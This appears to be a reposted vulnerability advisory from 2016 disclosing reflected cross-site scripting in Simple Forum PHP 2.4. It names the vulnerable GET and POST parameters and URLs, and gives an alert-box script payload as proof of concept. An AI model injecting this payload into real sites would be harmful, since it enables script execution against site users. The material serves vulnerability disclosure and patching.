Simple Forum PHP 2.4 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Simple Forum PHP 2.4 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>===================================================== # Simple Forum PHP 2.4 - Reflected XSS ===================================================== # Vendor Homepage: http://simpleforumphp.com # Date: 14 Oct 2016 # Demo Link : http://simpleforumphp.com/forum/admin.php # Version : 2.4 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com ===================================================== # PoC: Vulnerable parameter : SysMessage Mehod : GET Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://localhost/forum/preview.php?SysMessage=[payload] Vulnerable parameter : search Mehod : POST Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://simpleforumphp.com/forum/admin.php ===================================================== # Discovered By : Ehsan Hosseini ===================================================== </BODY></HTML>